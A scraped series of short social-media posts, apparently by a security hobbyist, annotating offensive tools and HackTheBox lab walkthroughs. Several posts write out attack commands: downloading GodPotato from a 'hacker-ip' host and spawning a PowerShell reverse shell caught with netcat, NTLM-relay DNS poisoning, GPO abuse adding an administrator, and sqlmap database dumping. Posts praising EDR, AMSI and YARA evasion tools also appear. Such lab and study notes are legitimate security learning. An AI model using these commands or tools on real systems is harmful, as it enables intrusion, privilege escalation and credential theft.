"revshells bashtcp bashudp python23linuxwin perl socat OpenSSL PHP telnet lua groovy meterpreter ruby rust golang TLS-PSK powershell awk java lua NodeJS Dart https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/ https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-reverse-cheatsheet/"  
[X Link](https://x.com/0Beider/status/1999065703777706252)  2025-12-11T10:36Z [--] followers, [---] engagements


"06 - telnet; lua; NodeJS; OGNL; dart"  
[X Link](https://x.com/0Beider/status/1999067360448372893)  2025-12-11T10:42Z [--] followers, [--] engagements


"Bind shells; apply when there is no firewall between attacker and victim; target machine is listening and waiting to grant control over to the attacking machine upon connection; perl python PHP Ruby Ncat powercat socat powershell https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#summary https://swisskyrepo.github.io/InternalAllTheThings/cheatsheets/shell-bind-cheatsheet/#summary"  
[X Link](https://x.com/0Beider/status/1999408801594876249)  2025-12-12T09:19Z [--] followers, [--] engagements


"01 bind shell perl; python; PHP; Ruby; ncat"  
[X Link](https://x.com/0Beider/status/1999409148254175364)  2025-12-12T09:21Z [--] followers, [--] engagements


"Villain [----] [----] C2 framework; generates backdoors rev TCP and hoaxShell based shells; shares backdoor between connected sibling servers; https://github.com/dmore/Villain-red-c2-tcp-reverse-shells-hoaxshell-multi/ https://github.com/dmore/Villain-red-c2-tcp-reverse-shells-hoaxshell-multi/"  
[X Link](https://x.com/0Beider/status/2000503375822254558)  2025-12-15T09:49Z [--] followers, [--] engagements


"HTB: Whiterabbit dec2025 0xdf hacks stuff; sqlmap attack on query where email limit [--] through mitmproxy ; adding sha256 signature hex recalc based on json struct in mitmproxy HTTP request interception; list dbs; dump victims and tmp db; https://0xdf.gitlab.io/2025/12/13/htb-whiterabbit.html#shell-as-bob-on-container https://0xdf.gitlab.io/2025/12/13/htb-whiterabbit.html#shell-as-bob-on-container"  
[X Link](https://x.com/0Beider/status/2001581524580475072)  2025-12-18T09:13Z [--] followers, [--] engagements


"Step [--] - try sending an email ending with double quote to crash the query; crash message received"  
[X Link](https://x.com/0Beider/status/2001582204460392493)  2025-12-18T09:15Z [--] followers, [--] engagements


"Step [--] - sqlmap commands; running with proxy and targeting email field as injetable; finds dbs; we tell it to list phishing --tables; phishing -T victims --dump; phishing_db table:victims dumped"  
[X Link](https://x.com/0Beider/status/2001585168046231942)  2025-12-18T09:27Z [--] followers, [--] engagements


"SCOMHunter [----] 2025; post expl ; enum and attack SCOM infra; find Enumerate LDAP for SCOM assets; http SCOM Web Console NTLM Relay Attack; mssql Convert provided sid to hex format and return MSSQL query ; dpapi Extract DPAPI Protected RunAs Credentials"  
[X Link](https://x.com/0Beider/status/2002360473199514112)  2025-12-20T12:48Z [--] followers, [--] engagements


"HTB BabyTwo 09-2025; netexec smb shares; guest perms seen; rid-attack pull users and groups; SYSVOL;poison logon script; revshell when user logs-in; GPO abuse exploit add-domainobjectacl powerview https://0xdf.gitlab.io/2025/09/26/htb-babytwo.html https://0xdf.gitlab.io/2025/09/26/htb-babytwo.html"  
[X Link](https://x.com/0Beider/status/2002786842412974479)  2025-12-21T17:02Z [--] followers, [--] engagements


"Step [--] - once we got GPOADM Bloodhound GPO ID marked as high-value; exploit with pyGPOAbuse [----] [----] by targeting h/v gpo-id with command "net localgroup administrators GPOADM /add"; domain admin reached;"  
[X Link](https://x.com/0Beider/status/2003169685043569097)  2025-12-22T18:24Z [--] followers, [--] engagements


"Tangled [----] calendar phishing weaponiser fwk ; initial access and lat mov; google meet and outlook invite; delivers spoofed meeting invites https://github.com/dmore/Tangled-red-phishing-weaponiser-icalendar-auto-roce https://github.com/dmore/Tangled-red-phishing-weaponiser-icalendar-auto-roce"  
[X Link](https://x.com/0Beider/status/2005250573013229891)  2025-12-28T12:12Z [--] followers, [--] engagements


"FindMeAccess [----] [----] v3 audit recon find gaps in Azure/M365 envs check gaps in coverage && obtain tokens ; audit gaps in federated setups with ADFS https://github.com/dmore/FindMeAccess-red-find-azure-gaps-steal-tokens-find-m365-mfa https://github.com/dmore/FindMeAccess-red-find-azure-gaps-steal-tokens-find-m365-mfa"  
[X Link](https://x.com/0Beider/status/2005566682069455280)  2025-12-29T09:08Z [--] followers, [--] engagements


"Shellcode Signature Patcher 2025; YARA signature evasion via targeted byte patching; crafts alt bytes that triggers signature matching; shellcode executes normally after runtime patching"  
[X Link](https://x.com/0Beider/status/2007297135692394539)  2026-01-03T03:45Z [--] followers, [--] engagements


"repo fork https://github.com/dmore/shellcode-mutator-red-transform-bytes-detected-by-yara-rules https://github.com/dmore/shellcode-mutator-red-transform-bytes-detected-by-yara-rules"  
[X Link](https://x.com/0Beider/status/2007297238134133033)  2026-01-03T03:45Z [--] followers, [--] engagements


"PsMapExec [----] [----] ; offensive PowerShell work stealthier by running fully in memory dumping SAM and LSASS credentials krbtgt kerbdump remote cmds exec find files wmi ekeys timeroast ACL persitence NTDS dump; blog dec-2025 https://hackers-arise.com/powershell-for-hackers-part-9-hacking-with-psmapexec/ https://hackers-arise.com/powershell-for-hackers-part-9-hacking-with-psmapexec/"  
[X Link](https://x.com/0Beider/status/2008137842493730871)  2026-01-05T11:25Z [--] followers, [--] engagements


"github repo fork https://github.com/dmore/PsMapExec-red-dominate-AD-with-powershell https://github.com/dmore/PsMapExec-red-dominate-AD-with-powershell"  
[X Link](https://x.com/0Beider/status/2008138091677278590)  2026-01-05T11:26Z [--] followers, [--] engagements


"Remote Jump Tool [----] PsExec-style end-to-end remote-service deployment; service manager built on top of impacket; pure SMB/DCE-RPC no agent req on target; needs creds to createdelete services and SMB shares; lets you upload custom service loader;depends impacket & python3.10"  
[X Link](https://x.com/0Beider/status/2008847654269415834)  2026-01-07T10:26Z [--] followers, [--] engagements


"repo fork https://github.com/dmore/impacket-jump-red-remote-service-staging-for-lat-mov-workflow-upload-custom-service-loaders https://github.com/dmore/impacket-jump-red-remote-service-staging-for-lat-mov-workflow-upload-custom-service-loaders"  
[X Link](https://x.com/0Beider/status/2008847759374471596)  2026-01-07T10:26Z [--] followers, [--] engagements


"Step [--] - custom service loader uploaded to share; new service created ImpacketJumpService referencing the custom service loader on new share"  
[X Link](https://x.com/0Beider/status/2008849457341932011)  2026-01-07T10:33Z [--] followers, [--] engagements


"Obex 2025; DLL EDR Blocking; spawn powershell.exe cmd whilst blocking default DLL-blocklist (amsi.dll); works with startup DLLs and dynamically loaded DLLs https://github.com/dmore/obex-red-blocking-unwanted-dlls-on-user-mode-process-cmd-launches https://github.com/dmore/obex-red-blocking-unwanted-dlls-on-user-mode-process-cmd-launches"  
[X Link](https://x.com/0Beider/status/2009246488317067298)  2026-01-08T12:51Z [--] followers, [--] engagements


"example; obex.exe powershell.exe (with default amsi.dll block list )"  
[X Link](https://x.com/0Beider/status/2009247075041452520)  2026-01-08T12:53Z [--] followers, [--] engagements


"dumpguard_bof 2026; fake RDP server; Impersonates CredSSP/RDP server locally. The BOF acts as a fake RDP server. Tricks Win SSPI into believing a full Kerberos + CredSSP auth; Havoc C2; user's credentials wrapped in TSRemoteGuardCreds. gets NTLMv1 hash from modern windows"  
[X Link](https://x.com/0Beider/status/2010332884817862800)  2026-01-11T12:48Z [--] followers, [--] engagements


"github repo fork https://github.com/dmore/dumpguard_bof-red-extract-NTLMv1-hashes-from-sessions-on-modern-windows/ https://github.com/dmore/dumpguard_bof-red-extract-NTLMv1-hashes-from-sessions-on-modern-windows/"  
[X Link](https://x.com/0Beider/status/2010333008847585290)  2026-01-11T12:48Z [--] followers, [--] engagements


"DumpGuard 2025; cred dumping tool that extracts NTLMv1 hashes of user modern windows sessions; relies on Remote Credential Guard Protocol; works even when Credential Guard is active; three modes ( dump own session using rcg all sessions using rcg all sessions msauth )"  
[X Link](https://x.com/0Beider/status/2010365257122713755)  2026-01-11T14:56Z [--] followers, [--] engagements


"usage overview; cred dumping when RCG defending"  
[X Link](https://x.com/0Beider/status/2010367173257269698)  2026-01-11T15:04Z [--] followers, [--] engagements


"you feel lucky. Regex Pattern Collection to find cloud provider access tokens auth pattern tokens security tokens and creds common identifiers secret detection ; Search-For-all-leaked-keys [----] https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex- https://github.com/Lu3ky13/Search-for-all-leaked-keys-secrets-using-one-regex-"  
[X Link](https://x.com/0Beider/status/2010655117742358698)  2026-01-12T10:08Z [--] followers, [--] engagements


"Sensitive Discoverer [----] [----] HTTP body & params burpsuite extension to scan for sensitive strings in HTTP messages https://github.com/dmore/sensitive-discoverer-red-burp-extension-scanner-sensitive-http-param-values https://github.com/dmore/sensitive-discoverer-red-burp-extension-scanner-sensitive-http-param-values"  
[X Link](https://x.com/0Beider/status/2010655431002116146)  2026-01-12T10:09Z [--] followers, [--] engagements


"ProfileHound 2025; post-expl AD offensive tool; find domain user profiles on machines; builds new edge HasUserProfile; needs admin access to the C$ share on target to enum user-prof ; reads NTUSER.DAT DPAPI dir ; works out if discovered profile is active and since when"  
[X Link](https://x.com/0Beider/status/2011015683186872666)  2026-01-13T10:01Z [--] followers, [--] engagements


"github repo fork https://github.com/dmore/profilehound-red-id-user-profiles-on-domain-machines-post-expl https://github.com/dmore/profilehound-red-id-user-profiles-on-domain-machines-post-expl"  
[X Link](https://x.com/0Beider/status/2011015743459258779)  2026-01-13T10:01Z [--] followers, [--] engagements


"Cookie-and-Handle-Stealer ; master Cookie Grabber-BOF [----] [----] ; c or BOF file to extract WebKit master key to decrypt user cookie; Cobalt Strike BOF; windows x64 exe; extracts edge chrome. any-webkit-.-browser master key; cookieprocessor.exe for cookie recovery"  
[X Link](https://x.com/0Beider/status/2011751362720383354)  2026-01-15T10:44Z [--] followers, [--] engagements


"github repo fork https://github.com/dmore/Cookie-and-Handle-Stealer-red-extract-webkit-master-key-to-decrypt-user-cookie- https://github.com/dmore/Cookie-and-Handle-Stealer-red-extract-webkit-master-key-to-decrypt-user-cookie-"  
[X Link](https://x.com/0Beider/status/2011751418525540477)  2026-01-15T10:44Z [--] followers, [--] engagements


"Extension-Kit for AdaptixC2 [----] 2026; already v1; BOF modules AD Creds Elevation Execution Injection Lat mov Process sit awareness Postexp sit awareness https://github.com/dmore/Extension-Kit-red-adaptix https://github.com/dmore/Extension-Kit-red-adaptix"  
[X Link](https://x.com/0Beider/status/2011780920815026556)  2026-01-15T12:42Z [--] followers, [--] engagements


"adaptix c2 fmk v1 [----] [----] https://github.com/dmore/AdaptixC2-red-postexpl-adversarial-fmwrk https://github.com/dmore/AdaptixC2-red-postexpl-adversarial-fmwrk"  
[X Link](https://x.com/0Beider/status/2011782041348493315)  2026-01-15T12:46Z [--] followers, [--] engagements


"lonkero [----] [----] web recon scanner professional grade intel scanner; detects modern stacks; [---] scanners; authentication & auth; Injection vulns; API Sec; Security Headers; business logic; specialised scanners; https://github.com/dmore/lonkero-red-web-security-scanner-wraps-around-target-ai https://github.com/dmore/lonkero-red-web-security-scanner-wraps-around-target-ai"  
[X Link](https://x.com/0Beider/status/2012154045222490498)  2026-01-16T13:24Z [--] followers, [--] engagements


"11 AWS Cognito enum ; extract user pool id client id from app bundles; CSP header analysis; OAuth redir URLs"  
[X Link](https://x.com/0Beider/status/2012158440093745358)  2026-01-16T13:42Z [--] followers, [--] engagements


"iac poisoned aws terraform backdoor via provider ; adding malicious custom iac tf provider that exfiltrates creds encrypted via dns exfiltration stealthily; blog 2024; https://blog.pirateship.sh/research/infrastructure/the-stealthy-terraform-trap/ https://blog.pirateship.sh/research/infrastructure/the-stealthy-terraform-trap/"  
[X Link](https://x.com/0Beider/status/2012838199576428545)  2026-01-18T10:43Z [--] followers, [--] engagements


"02 crafting evil aws provider"  
[X Link](https://x.com/0Beider/status/2012840050921263468)  2026-01-18T10:50Z [--] followers, [--] engagements


"malicious terraform provider statefile rce ==2024 allows RCE && injects dummy resource && exfils from terraform.tfstate if insecured; https://github.com/dmore/terraform-provider-statefile-rce-red-statefile-poisoning-inject-dummy-resource https://github.com/dmore/terraform-provider-statefile-rce-red-statefile-poisoning-inject-dummy-resource"  
[X Link](https://x.com/0Beider/status/2013222693844189297)  2026-01-19T12:11Z [--] followers, [--] engagements


"03 push changes to git; CICD pipeline auto-triggers and runs terraform init solo; malicious id.out with user ids has been generated; offensive resource has self-erased as is meant to do just that"  
[X Link](https://x.com/0Beider/status/2013224441501630769)  2026-01-19T12:18Z [--] followers, [--] engagements


"blog [----] ConfigManBearPig bloodhound collector for 30+ SCCM known attack vectors; aims to cover them all; https://specterops.io/blog/2026/01/13/introducing-configmanbearpig-a-bloodhound-opengraph-collector-for-sccm/ https://specterops.io/blog/2026/01/13/introducing-configmanbearpig-a-bloodhound-opengraph-collector-for-sccm/"  
[X Link](https://x.com/0Beider/status/2013603932027633764)  2026-01-20T13:26Z [--] followers, [--] engagements


"ConfigManBearPig [----] [----] fork github https://github.com/dmore/ConfigManBearPig-red-bloodhound-collector-add-SCCM-attack-paths https://github.com/dmore/ConfigManBearPig-red-bloodhound-collector-add-SCCM-attack-paths"  
[X Link](https://x.com/0Beider/status/2013604163813294476)  2026-01-20T13:26Z [--] followers, [--] engagements


"vulnx [----] [----] (cvemap evo) CVE vulnerability scanner; search vulns with precision https://github.com/dmore/cvemap-vulnerability-jungle-navigator https://github.com/dmore/cvemap-vulnerability-jungle-navigator"  
[X Link](https://x.com/0Beider/status/2013934489081094334)  2026-01-21T11:19Z [--] followers, [--] engagements


"htb hacknet Jan-2026; shell as root; cracking weakest pwd on 1024bit gpg keys with hashcat; https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html#shell-as-root https://0xdf.gitlab.io/2026/01/17/htb-hacknet.html#shell-as-root"  
[X Link](https://x.com/0Beider/status/2014300675677519941)  2026-01-22T11:34Z [--] followers, [--] engagements


"john the ripper [----] [----] has converting utilities in jumbo https://github.com/dmore/john-red-pwd-cracker-multi-hash-cipher-types https://github.com/dmore/john-red-pwd-cracker-multi-hash-cipher-types"  
[X Link](https://x.com/0Beider/status/2014305110709379263)  2026-01-22T11:52Z [--] followers, [--] engagements


"WTFTP [----] 2026; coerceexfilwtftp ; abuse TFTP basic file transfer protocol ; abuse Ms Deployment Protocol; combine with Responder [---] [----] [----] to catch NTLMv2-SSP hash from coerced XXD auth from over priv MDT server to leak MDT server AD machine account auth ; spoofs DHCP;"  
[X Link](https://x.com/0Beider/status/2014676642266804649)  2026-01-23T12:28Z [--] followers, [--] engagements


"github repo fork https://github.com/dmore/wtftp-red-py-spoofs-PXE-DHCP-coerce-MDT-server-AD-XXE-eleva-XXEOOD-exfil-win-depl-toolkit-MDT-WDS https://github.com/dmore/wtftp-red-py-spoofs-PXE-DHCP-coerce-MDT-server-AD-XXE-eleva-XXEOOD-exfil-win-depl-toolkit-MDT-WDS"  
[X Link](https://x.com/0Beider/status/2014676794276770219)  2026-01-23T12:29Z [--] followers, [--] engagements


"xaitax/ChromElevator [----] [----] v0.18; s t e a l t h y exfil browsr secrets ; post expl complete bypass chromium ABE; reflective process hollowing technique; launches legitimate browser in suspended state; hijacks identity and security context Living-Off-The-Land LOTL; fileless"  
[X Link](https://x.com/0Beider/status/2015389587992879566)  2026-01-25T11:41Z [--] followers, [--] engagements


"github repo fork https://github.com/dmore/Chrome-App-Bound-Encryption-Decryption-RED https://github.com/dmore/Chrome-App-Bound-Encryption-Decryption-RED"  
[X Link](https://x.com/0Beider/status/2015389687989309927)  2026-01-25T11:42Z [--] followers, [--] engagements


"Nebula [----] Nefarious Exec & Behavioral Unit for LOLBAS Attacks; persistence attack fwk; needs admin right ; interactive Ps TUI; exploring COM WMI LOLBAS execution techniques. regsvr32-squiblydoo mshta rundll32 certutil-dwnld installutil https://github.com/dmore/NEBULA-red-ps-test-WMI-COM-LOLBAS-and-persistence-tech/ https://github.com/dmore/NEBULA-red-ps-test-WMI-COM-LOLBAS-and-persistence-tech/"  
[X Link](https://x.com/0Beider/status/2015816490260300183)  2026-01-26T15:57Z [--] followers, [--] engagements


"05 MSHTA abuse; direct URL invocation: inline vbscript invocation: inline javascript remote scriptlet execution;"  
[X Link](https://x.com/0Beider/status/2015819468295876792)  2026-01-26T16:09Z [--] followers, [--] engagements


"trustedsec/swarmer [----] 2026; stealthy registry tamperer one non-admin go then admin needed ; parse registry export as a binary registry hive abusing Offline Registry API. unseen by you-know-who; does not touch any traditional reg readwrite APIs; https://github.com/dmore/swarmer-red-stealthy-modify-win-reg-as-low-priv-user-without-edr-detection https://github.com/dmore/swarmer-red-stealthy-modify-win-reg-as-low-priv-user-without-edr-detection"  
[X Link](https://x.com/0Beider/status/2016129974135042192)  2026-01-27T12:43Z [--] followers, [--] engagements


"HTB::Job Jan2025 oxdf hacks stuff; exploiting shell on wwwroot website perms; grab ASPX webshell as iisapppooldefaultapppool ; recon and exploit webshell seImpersonatePrivs with godpotato [----] [----] to gain SYSTEM on shell; revshell from system shell back with netcat"  
[X Link](https://x.com/0Beider/status/2016780541819822463)  2026-01-29T07:48Z [--] followers, [--] engagements


"shell as system https://0xdf.gitlab.io/2026/01/26/htb-job.html#shell-as-system https://0xdf.gitlab.io/2026/01/26/htb-job.html#shell-as-system"  
[X Link](https://x.com/0Beider/status/2016780754777256255)  2026-01-29T07:49Z [--] followers, [--] engagements


"01 iwr aspx shell down from kali; situational awareness with net user; whoami /all shows us privileges enablement status"  
[X Link](https://x.com/0Beider/status/2016781748269441153)  2026-01-29T07:53Z [--] followers, [--] engagements


"03 now that the shell is elevated to SYSTEM we grab a new base64 encoded ps revshell ) that will connect to a brand-new side nc shell ; whoami on it says nt authority system. https://revshells.com https://revshells.com"  
[X Link](https://x.com/0Beider/status/2016783906490503425)  2026-01-29T08:02Z [--] followers, [--] engagements


"GodPotato [----] [----] github fork https://github.com/dmore/GodPotato-red-privesc-dcom-impersonate-priviledge-gain-system https://github.com/dmore/GodPotato-red-privesc-dcom-impersonate-priviledge-gain-system"  
[X Link](https://x.com/0Beider/status/2016784062858362881)  2026-01-29T08:02Z [--] followers, [--] engagements


"aspx webshell fork [----] ==2021 4y-unchanged careful though as there is a linked repo to chinese content and we know how it ends https://github.com/dmore/webshell-red-aspx-php-jsp-aws-chinese-turkish/tree/master/AntSwordProject https://github.com/dmore/webshell-red-aspx-php-jsp-aws-chinese-turkish/tree/master/AntSwordProject"  
[X Link](https://x.com/0Beider/status/2016803470691484046)  2026-01-29T09:19Z [--] followers, [--] engagements


"@HungaryBased Bless you all dear Polish Godly Patriots. God keeps testing as all. Jesus Christ is our King"  
[X Link](https://x.com/0Beider/status/2016854034427125867)  2026-01-29T12:40Z [--] followers, [--] engagements


"RustPotato [----] (evo for GodPotato [----] 2024) : also abuses DCOM and RPC to with SeImpersonatePrivilege gains NT AUTHORITYSYSTEM privileges on modern Windows systems. ai beautifully recommends RoguePotato ==2019 instead and totally misses the mark https://github.com/dmore/RustPotato-red-dcom-rpc-named-pipes-gain-system-tcp-reverse-shell https://github.com/dmore/RustPotato-red-dcom-rpc-named-pipes-gain-system-tcp-reverse-shell"  
[X Link](https://x.com/0Beider/status/2016877011210285359)  2026-01-29T14:12Z [--] followers, [--] engagements


"@hackinghub_io beautiful; /bin/bash -p"  
[X Link](https://x.com/0Beider/status/2016895726358331659)  2026-01-29T15:26Z [--] followers, [---] engagements


"Locksmith [----] 2026; scan and fix ADCS vulns found on forest; needs admin"  
[X Link](https://x.com/0Beider/status/2016942517833400582)  2026-01-29T18:32Z [--] followers, [--] engagements


"Locksmith [----] [----] github fork https://github.com/dmore/Locksmith-red-blue-ADCS-misconfigs/ https://github.com/dmore/Locksmith-red-blue-ADCS-misconfigs/"  
[X Link](https://x.com/0Beider/status/2016942716148404655)  2026-01-29T18:33Z [--] followers, [--] engagements


"Shellz [----] ==2024 rev shell offensive fwk; embeds updog side web.server; ps python ; staged & unstaged; gens attack payloads; receiving shell rlwrap nc tcp; OpenSSL; MSF Multi/Handler; breaks default WDAC policy ; AV real-time defender protection Win11 24H; hardend pol fails vid"  
[X Link](https://x.com/0Beider/status/2017197863197987237)  2026-01-30T11:27Z [--] followers, [--] engagements


"shellz [----] ==2024 github fork https://github.com/dmore/shells-revs-red/ https://github.com/dmore/shells-revs-red/"  
[X Link](https://x.com/0Beider/status/2017198026981286228)  2026-01-30T11:27Z [--] followers, [--] engagements


"udp2raw-tunnel [----] 2025; aim is bypass shake UDP firewalls; turns UDP traffic into encrypted fake TCPUDPICMP ; can tunnel any type of traffic when combined with OpenVPNL2TPShadowVPN https://github.com/dmore/udp2raw-red-tunnel-bypass-UDP-firewall-turns-udptraffic-into-encrypted-udp-or-faketcp- https://github.com/dmore/udp2raw-red-tunnel-bypass-UDP-firewall-turns-udptraffic-into-encrypted-udp-or-faketcp-"  
[X Link](https://x.com/0Beider/status/2017260801950708189)  2026-01-30T15:37Z [--] followers, [--] engagements


"msldap [----] 2026; AD pentest lib to audit recon and (also) attack AD via LDAPS ; support NTLMKERBEROSSSPI; SOCKS45 minimal footprint; supports channel binding (ntlmkerb) and encryption (ntlmkerbsspi) https://github.com/dmore/msldap-red-blue-audit-ms-ad/ https://github.com/dmore/msldap-red-blue-audit-ms-ad/"  
[X Link](https://x.com/0Beider/status/2017606197663142195)  2026-01-31T14:29Z [--] followers, [--] engagements


"Step [--] - for GCP id returns user is root; we get the access_token from the container: curl -s -H "Authorization: Bearer $access_token" . https://storage.googleapis.com/download/storage/v1/b/private-image-file.jpg https://storage.googleapis.com/download/storage/v1/b/private-image-file.jpg"  
[X Link](https://x.com/0Beider/status/2000910159326106091)  2025-12-16T12:45Z [--] followers, [--] engagements


"JWTAuditor 2025; pentest advance attack tool finds vulns on JWT tokens; algo vuln detection; sensitive data exposure; missing security claims; KID param attack; None algo bypass; Algo confusion RS256 to HS256; JKUXSU mani; JWK header inj; priv esc attack; claim spoof; secret bf"  
[X Link](https://x.com/0Beider/status/2006674808491462677)  2026-01-01T10:32Z [--] followers, [--] engagements


"features; security analyzer; advanced attack platform; remove signature verification; convert algo types 14; KID param injection; path-trav cmd-inj ; remote key inj with auto RSA key gen; embed malicious pub keys in token headers; secret bruteforcer"  
[X Link](https://x.com/0Beider/status/2006676244369149989)  2026-01-01T10:37Z [--] followers, [--] engagements


"PowerZure security assessment cheatsheet 1337skills; recon & info gathering; privesc; persistence techniques; data exfil; advanced attack techniques; evasion techniques; automation; cont monitoring https://1337skills.com/cheatsheets/powerzure/ https://1337skills.com/cheatsheets/powerzure/"  
[X Link](https://x.com/0Beider/status/2008523581115007036)  2026-01-06T12:58Z [--] followers, [--] engagements


"05 advanced attack techniques"  
[X Link](https://x.com/0Beider/status/2008524216489177414)  2026-01-06T13:01Z [--] followers, [--] engagements


"htb:: jobTwo 0xdf hacks stuff; jan-2026; shell-as-ferdinand; cracking encrypted hex pwd.; blowfish forgotten key; CyberChef decrypt crack: py hex decrypt crack: and expoiting SQL Server CE db through Data Source passing new dll; https://0xdf.gitlab.io/2026/01/27/htb-jobtwo.html#shell-as-ferdinand https://0xdf.gitlab.io/2026/01/27/htb-jobtwo.html#shell-as-ferdinand"  
[X Link](https://x.com/0Beider/status/2018303464518873270)  2026-02-02T12:40Z [--] followers, [--] engagements


"00 find hMailServer.ini with hex encrypted pwd: unfortunately commonly forgotten old blowfish key is in fact used ; cyberchef prooves PasswordToEncrypt"  
[X Link](https://x.com/0Beider/status/2018304557542003157)  2026-02-02T12:44Z [--] followers, [--] engagements


"01 pythonian script to do the same from encrypted hex; unhexlifies: swaps endianness ; cipher blowfish mode.ECB with default THIS_KEY.NOT_SECRET; cypher decrypt; swap endianness finally"  
[X Link](https://x.com/0Beider/status/2018305498739585502)  2026-02-02T12:48Z [--] followers, [--] engagements


"tirith [----] ; defends console from homograf attacks; non compliant characters that resolve to a different domain name .non_ascii_hostname Cyrillic (U+0456) in hostname https://github.com/dmore/tirith-red-blue-ansi-url-injection-pipe-to-shell-attacks-command-shell-defense-vs-homograph-attacks https://github.com/dmore/tirith-red-blue-ansi-url-injection-pipe-to-shell-attacks-command-shell-defense-vs-homograph-attacks"  
[X Link](https://x.com/0Beider/status/2018697068324196747)  2026-02-03T14:44Z [--] followers, [--] engagements


"what it catches; homograph attacks; terminal injection; pipe-to-shell; Dotfile atttacks; insecure transport; git clone typosquots; untrusted docker registries; credential exposure"  
[X Link](https://x.com/0Beider/status/2018697651940634837)  2026-02-03T14:46Z [--] followers, [--] engagements


"Recollapse [----] ==2025; generate payloads for ffuf burp intruder caido ; black box regex fuzzing TO bypass validations AND discover normalizations in WebApps and APIs; discover untested arenas: github copilot not thinking when generating broken regex to unexpecting users"  
[X Link](https://x.com/0Beider/status/2019051748116045961)  2026-02-04T14:13Z [--] followers, [--] engagements


"02 we are not the same (ruby python javascript) different weaknesses"  
[X Link](https://x.com/0Beider/status/2019054248072249461)  2026-02-04T14:23Z [--] followers, [--] engagements


"htb:signed;feb-2026: SeImpersonate Restoration; sandbox-attack-surface-analysis-tools [----] [----] :abuse network_service proc rcpss-service prev saved LSASS token; impersonate named-pipe: New-Win32Process; abuse SMB; GodPotato with ps revshell with nc; https://0xdf.gitlab.io/2026/02/07/htb-signed.html#via-seimpersonate-restoration https://0xdf.gitlab.io/2026/02/07/htb-signed.html#via-seimpersonate-restoration"  
[X Link](https://x.com/anyuser/status/2022336175361720820)  2026-02-13T15:44Z [--] followers, [--] engagements


"00 get token ; impersonating pipe; get-NtToken -Impersonation ; $token.privileges SeImpersonatePrivilegeEnabledByDefault"  
[X Link](https://x.com/anyuser/status/2022337316220768725)  2026-02-13T15:49Z [--] followers, [--] engagements


"exploit MS-EFSR petit potam efssvc.dll vuln with NTObjectManagergoogleprojectzero querying MS-RPC Server ; getting RPC $client; comms via named pipes efsrpc; connect RPC client over named pipe with binding string; EfsRpcOpenFileRaw success; blog [----] https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/ https://www.incendium.rocks/posts/Automating-MS-RPC-Vulnerability-Research/"  
[X Link](https://x.com/0Beider/status/1985691269603995805)  2025-11-04T12:51Z [--] followers, [---] engagements


"Step [--] - format the interface into an RPC Client; will render c_sharp code source for compiling RPC Clients"  
[X Link](https://x.com/0Beider/status/1985693259793142118)  2025-11-04T12:59Z [--] followers, [--] engagements


"serverless-pray 2020; cloud remote shells exploit serverless containers with permissions granted to other services like s3; presentations attacks aws gcp and azure using very same container env tokens and secrets to other inter cloud services. https://www.youtube.com/watchv=SV69iUrYlTQ https://www.youtube.com/watchv=SV69iUrYlTQ"  
[X Link](https://x.com/0Beider/status/2000897885693472909)  2025-12-16T11:56Z [--] followers, [--] engagements


"Step [--] - script/panther --url-id $API_GW_ID --api-key $API_KEY -l true; id to see perm level; reconnect on drop to keep victim container warm"  
[X Link](https://x.com/0Beider/status/2000898762953384227)  2025-12-16T12:00Z [--] followers, [--] engagements


"htb::signed; feb-2026; many esc; coerce dc01 auth via empty credential target; krbrelayx dnstool add dc011UWhRCA.AAYBAAAA (points to hacker ip) ; dfs coerce; nxc smb dc -u mssqlsvc -p pwd -M coerce_plus; impacket ntlmrelayx catch winrms interactive session; nc via proxychains"  
[X Link](https://x.com/anyuser/status/2021667511763448018)  2026-02-11T19:27Z [--] followers, [--] engagements


"many escalations via NTLM Relay https://0xdf.gitlab.io/2026/02/07/htb-signed.html#many-escalations https://0xdf.gitlab.io/2026/02/07/htb-signed.html#many-escalations"  
[X Link](https://x.com/0Beider/status/2021667663630807362)  2026-02-11T19:28Z [--] followers, [--] engagements


"01 process with token ; New-Win32Process -Commandline 'cmd.exe /c whoami /priv 2&1 /programdata/output.txt' -token $token; permissions granted we shall godpotato next using same approach"  
[X Link](https://x.com/anyuser/status/2022337812570497120)  2026-02-13T15:51Z [--] followers, [--] engagements


"02 iwr http://hacker-ip/GodPotato-Net4.exe -outfile gp.exe ; iwr shell from revshells too; New-Win32Process -Commandline 'C:programdatagp.exe -cmd "powershell C:programdatashell.ps1 2&1"' -token $token whislt nc -lnvp [---] to catch connection whoami nt authoritysystem"  
[X Link](https://x.com/anyuser/status/2022338743705956664)  2026-02-13T15:55Z [--] followers, [--] engagements


"htb:signed;feb-2026: SeImpersonate Restoration; sandbox-attack-surface-analysis-tools [----] [----] :abuse network_service proc rcpss-service prev saved LSASS token; impersonate named-pipe: New-Win32Process; abuse SMB; GodPotato with ps revshell with nc; https://0xdf.gitlab.io/2026/02/07/htb-signed.html#via-seimpersonate-restoration https://0xdf.gitlab.io/2026/02/07/htb-signed.html#via-seimpersonate-restoration"  
[X Link](https://x.com/anyuser/status/2022336175361720820)  2026-02-13T15:44Z [--] followers, [--] engagements


"St Michael defend us in battle ⚔"  
[X Link](https://x.com/anyuser/status/2013427572533555639)  2026-01-20T01:45Z 11.9K followers, [----] engagements


"We fly to your patronage O Holy Mother of God despise not our prayers in our necessities but ever deliver us from all dangers O glorious and blessed Virgin"  
[X Link](https://x.com/anyuser/status/2016597074423239030)  2026-01-28T19:39Z 11.9K followers, [----] engagements


"Quien como Dios"  
[X Link](https://x.com/anyuser/status/2022352134139003020)  2026-02-13T16:48Z 52.1K followers, [----] engagements


"Queen of The Angels 🕊"  
[X Link](https://x.com/anyuser/status/2021962128148901914)  2026-02-12T14:58Z 11.9K followers, 16.1K engagements


"exceptional also . Hilary Hahn https://www.youtube.com/watchv=KDJ6Wbzgy3E https://www.youtube.com/watchv=KDJ6Wbzgy3E"  
[X Link](https://x.com/anyuser/status/2022339430095433853)  2026-02-13T15:57Z [--] followers, [--] engagements


"02 iwr http://hacker-ip/GodPotato-Net4.exe -outfile gp.exe ; iwr shell from revshells too; New-Win32Process -Commandline 'C:programdatagp.exe -cmd "powershell C:programdatashell.ps1 2&1"' -token $token whislt nc -lnvp [---] to catch connection whoami nt authoritysystem"  
